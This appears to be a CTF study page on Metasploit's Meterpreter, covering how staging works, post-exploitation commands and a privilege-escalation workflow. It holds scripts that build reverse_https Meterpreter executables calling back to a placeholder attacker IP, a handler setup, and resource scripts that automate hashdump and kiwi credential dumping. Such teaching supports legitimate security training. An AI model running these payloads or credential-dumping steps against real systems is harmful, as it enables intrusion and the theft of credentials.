> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/msf/meterpreter.md).

# Meterpreter

**What is it?**

Meterpreter is MSF's most powerful payload — dubbed the "swiss army knife" of pentesting. Key properties:

* **In-memory by default** — when delivered by an exploit or stager it is injected into the compromised process, so no new process is created and nothing touches disk unless you ask for it (`upload`, `shell`, `execute` and `migrate` all create files or processes). "Stealthy" is relative: stock Meterpreter is heavily signatured, and in-memory does not mean invisible to AV/EDR
* **Encrypted transport** — the TLV packet stream is AES-256 encrypted with a key negotiated when the session opens; the `reverse_https` transport wraps that in TLS as well
* **Powerful** — channelized communication: file transfers, port forwards and spawned OS shells each get their own channel over the single session socket
* **Extensible** — extensions (`stdapi`, `priv`, `incognito`, `kiwi`, ...) are loaded reflectively at runtime with `load <ext>`, without rebuilding the payload

***

**How it Works (on exploit)**

1. Target runs the initial stager (reverse connects back to the handler, bind listens for it). The stager is tiny and does nothing but open the socket.
2. The handler sends the Meterpreter DLL (`metsrv`) over that socket and the stager reflectively loads it inside the current process, so the DLL never hits disk. With a stageless payload (`meterpreter_reverse_...`, underscore not slash) the DLL is embedded and this step is skipped.
3. Meterpreter core initializes, negotiates the AES session key with the handler, and the handler configures the session (transport, timeouts).
4. Extensions load: `stdapi` always; `priv` (`getsystem`, `hashdump`, `timestomp`) on Windows. Loading `priv` grants nothing by itself, its commands still need the rights they ask for. Others such as `incognito` and `kiwi` you load by hand.
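The staged/stageless split in steps 1 and 2 decides which payload you generate and which handler must be listening. The script below is an added example (not from the original page or the Metasploit project): it builds both variants with msfvenom and writes a matching `multi/handler` resource script. `LHOST`/`LPORT` values and the output directory are placeholders; the payload generation is skipped if msfvenom is not installed.

```sh
#!/bin/sh
# Added example: staged vs stageless Meterpreter delivery and a matching handler.
# Assumed placeholder values: LHOST 10.10.14.5, LPORT 443, output in a temp dir.
LHOST="${LHOST:-10.10.14.5}"
LPORT="${LPORT:-443}"
OUT_DIR="${OUT_DIR:-$(mktemp -d)}"

# Staged: the EXE carries only the stager; metsrv (the reflective DLL) is pulled
# from the handler over the socket at step 2. Small, but the handler MUST be
# running with exactly this payload name or the stage is never delivered.
STAGED_PAYLOAD="windows/x64/meterpreter/reverse_https"
# Stageless: the whole Meterpreter is embedded (note the underscore), so nothing
# is fetched at connect time; bigger on disk, fewer moving parts on the wire.
STAGELESS_PAYLOAD="windows/x64/meterpreter_reverse_https"

# Write a multi/handler resource script for the given payload name.
write_handler_rc() {
  payload="$1"; out="$2"
  cat > "$out" <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $LHOST
set LPORT $LPORT
# keep listening after the first session so re-spawned sessions can reconnect
set ExitOnSession false
# leave the exploited process as soon as the session opens (step 4 / migrate)
set AutoRunScript post/windows/manage/migrate
exploit -j -z
EOF
  echo "$out"
}

# Generate the executables only if msfvenom exists; the rc file is written regardless.
build_payloads() {
  if command -v msfvenom >/dev/null 2>&1; then
    msfvenom -p "$STAGED_PAYLOAD"    LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$OUT_DIR/staged.exe"
    msfvenom -p "$STAGELESS_PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$OUT_DIR/stageless.exe"
  else
    echo "msfvenom not found; skipping payload generation" >&2
  fi
}

HANDLER_RC=$(write_handler_rc "$STAGED_PAYLOAD" "$OUT_DIR/handler.rc")
build_payloads
# Start the listener with:  msfconsole -q -r "$HANDLER_RC"
# For stageless.exe, write a second rc with $STAGELESS_PAYLOAD: the names must match.
```

The handler is started as a job (`-j -z`) with `ExitOnSession false` so one listener serves every callback; `AutoRunScript post/windows/manage/migrate` implements the "get out of w3wp.exe" advice from the notes automatically.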

***

**Essential Commands**

**System info:**

```bash
sysinfo        # OS, hostname, arch
getuid         # current user
getpid         # current process ID
ps             # list all running processes
```

**Privilege:**

```bash
load incognito      # steal_token lives in the incognito extension, not stdapi
steal_token <PID>   # impersonate the token of another process (thread-level, not a real elevation)
rev2self            # drop the stolen token and return to your original identity
hashdump            # priv extension: dump SAM password hashes (needs SYSTEM)
load kiwi           # Mimikatz extension; needs a session whose arch matches the host (x64 on x64), migrate first
lsa_dump_sam        # dump SAM database (run as SYSTEM or results are incomplete)
lsa_dump_secrets    # dump LSA secrets (same requirement)
```

**Navigation:**

```bash
pwd / getwd    # current directory on the target
ls / dir       # list files
cd             # change directory
cat            # read file
download <remote> [local]        # pull a file back to the attacker box
upload <local> [remote]          # push a file to the target (this one does write to disk)
search -f <pattern> [-d <dir>]   # find files by name, e.g. search -f *.kdbx -d C:\\Users
```

**Networking:**

```bash
ifconfig / ipconfig   # target's network interfaces (a second NIC means a network to pivot into)
netstat               # active connections
arp                   # ARP cache
portfwd add -l 3389 -p 3389 -r <target>   # forward attacker-local 3389 through the session; portfwd list / portfwd delete
route                 # the target's routing table. To pivot msf traffic through this session use
                      # run post/multi/manage/autoroute SUBNET=<subnet>, or msfconsole's route add <subnet> <mask> <session>
```

**Shell:**

```bash
shell          # spawn cmd.exe/bash as a dedicated channel (a new process, so it does show up in ps)
background     # (or bg) park the session and return to the msfconsole prompt
sessions -i 1  # msfconsole command, not meterpreter: re-attach to session 1
migrate <PID>  # move Meterpreter into another process; you need rights to open that process
```

***

**Key Workflow — Priv Esc Pattern**

This is the standard flow you'll use constantly:

```bash
# 1. Land a meterpreter session, check who you are
meterpreter > getuid         # e.g. NT AUTHORITY\NETWORK SERVICE

# 2. If getuid errors with access denied, or you are a low-priv service account,
#    impersonate a token from a better process (incognito is not loaded by default)
meterpreter > load incognito
meterpreter > ps             # find a process running as a higher-priv user
meterpreter > steal_token 1836

# 3. Background the session and run the local exploit suggester
#    (a post module: it takes SESSION, not RHOSTS)
meterpreter > bg
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run

# 4. Pick a suggested exploit, set SESSION, run. Most local exploits need the
#    session arch to match the OS (x64 meterpreter on x64 Windows): migrate first if not
msf6 > use exploit/windows/local/ms15_051_client_copy_image
msf6 > set SESSION 1
msf6 > set LHOST tun0
msf6 > run

# 5. Now SYSTEM: confirm, then dump hashes (hashdump is priv, lsa_dump_sam is kiwi)
meterpreter > getuid         # expect NT AUTHORITY\SYSTEM
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > lsa_dump_sam
```
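Steps 3 and 5 of this workflow are the same every time, so they are worth scripting. The following is an added example (not from the original page or the Metasploit project): a shell wrapper that writes two msfconsole resource scripts, one that runs the suggester against every open Meterpreter session and one that dumps hashes from the newest session once it is SYSTEM. Step 4 (choosing and firing a local exploit) stays manual on purpose. The file locations are assumed placeholders.

```sh
#!/bin/sh
# Added example: resource scripts automating steps 3 and 5 of the privesc workflow.
# Assumed: scripts are written to a temp dir and loaded with `resource <file>` from
# an msfconsole that already holds sessions.
RC_DIR="${RC_DIR:-$(mktemp -d)}"

# Step 3 for every live Meterpreter session.
write_privesc_rc() {
  out="$1"
  # quoted heredoc: the #{...} interpolation is Ruby for msfconsole, not for the shell
  cat > "$out" <<'EOF'
<ruby>
# Resource scripts may embed Ruby; run_single() feeds one console command line.
framework.sessions.each_pair do |sid, sess|
  next unless sess.type == 'meterpreter'   # post modules need a Meterpreter SESSION
  run_single("use post/multi/recon/local_exploit_suggester")
  run_single("set SESSION #{sid}")         # SESSION, not RHOSTS: it is a post module
  run_single("set SHOWDESCRIPTION true")
  run_single("run")
end
</ruby>
# Step 4 is manual: read the suggester output, then for example
#   use exploit/windows/local/ms15_051_client_copy_image
#   set SESSION 1
#   set LHOST tun0
#   run
EOF
  echo "$out"
}

# Step 5 against the newest session (the one the local exploit just opened).
# `sessions -C <cmd> -i <sid>` runs a Meterpreter command without going interactive.
write_dump_rc() {
  out="$1"
  cat > "$out" <<'EOF'
<ruby>
sid = framework.sessions.keys.max
%w[getuid hashdump].each { |cmd| run_single("sessions -C #{cmd} -i #{sid}") }
# kiwi is not loaded by default and wants an x64 session on an x64 host
run_single("sessions -C 'load kiwi' -i #{sid}")
run_single("sessions -C lsa_dump_sam -i #{sid}")
</ruby>
EOF
  echo "$out"
}

PRIVESC_RC=$(write_privesc_rc "$RC_DIR/privesc.rc")
DUMP_RC=$(write_dump_rc "$RC_DIR/dump.rc")
# In msfconsole, once a session is open:   resource <path to privesc.rc>
# After the local exploit lands SYSTEM:    resource <path to dump.rc>
```

Check `getuid` in the dump script's output before trusting the hashes: if the local exploit failed silently, the newest session is still the low-privilege one and `hashdump` will simply error out.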

***

**Important Notes**

* **`migrate`** — moves Meterpreter into another process. Useful for stability or privilege. If you're in a web worker (w3wp.exe) or any short-lived process, migrate to something long-lived such as explorer.exe. You can only migrate into a process you have rights to open, and migrating into an x64 process gives you an x64 session, which `kiwi` and most local exploits need on x64 hosts.
* **`steal_token`** — doesn't fully elevate you, it only impersonates (a thread token, so some commands still fail). `rev2self` undoes it. Use local exploit suggester for real privesc.
* **`hashdump`** requires SYSTEM — won't work as a low-priv user; check `getuid` before blaming the module.
* **Leaving traces** — the IIS example shows a `.asp` file left behind when deletion fails. Real engagements require cleanup; MSF tries but doesn't always succeed, so check the webroot and temp directories yourself before leaving.
* **`local_exploit_suggester`** is a post module — always needs `SESSION` set, not RHOSTS.

<figure><img src="/files/XXw8XAe55aPEyigh7a9S" alt=""><figcaption></figcaption></figure>


